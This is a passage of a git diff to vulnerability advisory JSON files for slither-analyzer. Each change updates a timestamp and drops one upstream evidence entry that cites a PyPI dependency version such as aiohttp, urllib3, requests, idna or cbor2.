"pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-27306.json b/advisories/BREW-slither-analyzer-CVE-2024-27306.json index d16daa38ae0..392d074d8b3 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-27306.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-27306", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-30251.json b/advisories/BREW-slither-analyzer-CVE-2024-30251.json index 50674f4e6f7..2f170638b5a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-30251.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-30251", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-35195.json b/advisories/BREW-slither-analyzer-CVE-2024-35195.json index 0a6ea878e40..c00c2dacf0f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-35195.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-35195", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-3651.json b/advisories/BREW-slither-analyzer-CVE-2024-3651.json index 50105cd920a..2adee2177f7 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-3651.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-3651", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-37891.json b/advisories/BREW-slither-analyzer-CVE-2024-37891.json index 8faab8fc47b..db5e688af2e 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-37891.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-37891", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-42367.json b/advisories/BREW-slither-analyzer-CVE-2024-42367.json index 8b40f7a988f..1416d5e660c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-42367.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-42367", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-47081.json b/advisories/BREW-slither-analyzer-CVE-2024-47081.json index cf8205a0b9f..86d80965523 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-47081.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-47081", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-52303.json b/advisories/BREW-slither-analyzer-CVE-2024-52303.json index f7ddd09f243..b49ed71335e 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-52303.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-52303", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-52304.json b/advisories/BREW-slither-analyzer-CVE-2024-52304.json index 83121f5ecb2..2737ae776b7 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-52304.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-52304", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-50181.json b/advisories/BREW-slither-analyzer-CVE-2025-50181.json index 2cd3477a470..2ae68a3a5a2 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-50181.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-50181", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-50182.json b/advisories/BREW-slither-analyzer-CVE-2025-50182.json index e60f69afc16..25ae27c8608 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-50182.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-50182", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-53643.json b/advisories/BREW-slither-analyzer-CVE-2025-53643.json index 833315b266e..4b93d3dea7c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-53643.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-53643", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-64076.json b/advisories/BREW-slither-analyzer-CVE-2025-64076.json index 538dfecdd3a..0331d8ff8f8 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-64076.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-64076.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-64076", "published": "2026-08-13T17:34:41Z", - "modified": "2026-09-02T09:56:29Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "PYSEC-2025-238", "CVE-2025-64076", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": "pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-66418.json b/advisories/BREW-slither-analyzer-CVE-2025-66418.json index e454837ffdd..19738ab8c5e 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-66418.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-66418", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-66471.json b/advisories/BREW-slither-analyzer-CVE-2025-66471.json index d21b0ae08f7..3041896b273 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-66471.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-66471", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-68131.json b/advisories/BREW-slither-analyzer-CVE-2025-68131.json index d0ff386fb4c..90cdf3ef2b6 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-68131.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-68131.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-68131", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-wcj4-jw5j-44wh", "CVE-2025-68131", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": "pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69223.json b/advisories/BREW-slither-analyzer-CVE-2025-69223.json index 6d2154d5580..7568e454e93 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69223.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69223", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69224.json b/advisories/BREW-slither-analyzer-CVE-2025-69224.json index 69a8aa57c70..7214091849d 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69224.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69224", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69225.json b/advisories/BREW-slither-analyzer-CVE-2025-69225.json index c75a0b91fae..db7bbfbf989 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69225.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69225", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69226.json b/advisories/BREW-slither-analyzer-CVE-2025-69226.json index 876416ae3ec..de429c157b2 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69226.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69226", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69227.json b/advisories/BREW-slither-analyzer-CVE-2025-69227.json index 0a9f2d725be..924c86a98c2 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69227.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69227", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69228.json b/advisories/BREW-slither-analyzer-CVE-2025-69228.json index 1f3618ff004..4bc5c0ceda2 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69228.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69228", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69229.json b/advisories/BREW-slither-analyzer-CVE-2025-69229.json index ad5660ba4fe..4282aa2df8c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69229.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69229", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69230.json b/advisories/BREW-slither-analyzer-CVE-2025-69230.json index 56a9aea4fc3..3550aed1ac4 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69230.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69230", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-21441.json b/advisories/BREW-slither-analyzer-CVE-2026-21441.json index 8f898a755af..15918078356 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-21441.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-21441", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-22815.json b/advisories/BREW-slither-analyzer-CVE-2026-22815.json index 533803578b9..df905036259 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-22815.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-22815", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-25645.json b/advisories/BREW-slither-analyzer-CVE-2026-25645.json index 99c7a9049fb..60cd30811c9 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-25645.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-25645", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-26209.json b/advisories/BREW-slither-analyzer-CVE-2026-26209.json index 754f946087d..a8e7e9ae08a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-26209.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-26209.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-26209", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-3c37-wwvx-h642", "CVE-2026-26209", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": "pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34513.json b/advisories/BREW-slither-analyzer-CVE-2026-34513.json index 5175f7ec338..d3dfc102e5b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34513.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34513", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34514.json b/advisories/BREW-slither-analyzer-CVE-2026-34514.json index 9fc779279b8..c2643e36943 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34514.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34514", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34515.json b/advisories/BREW-slither-analyzer-CVE-2026-34515.json index e25f85cb1c1..cd2d92c23cd 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34515.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34515", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34516.json b/advisories/BREW-slither-analyzer-CVE-2026-34516.json index 2dc24d1f520..813a2ebcfe2 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34516.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34516", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-34517.json b/advisories/BREW-slither-analyzer-CVE-2026-34517.json index 2015afabcda..777cab61b81 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-34517.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-34517", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": 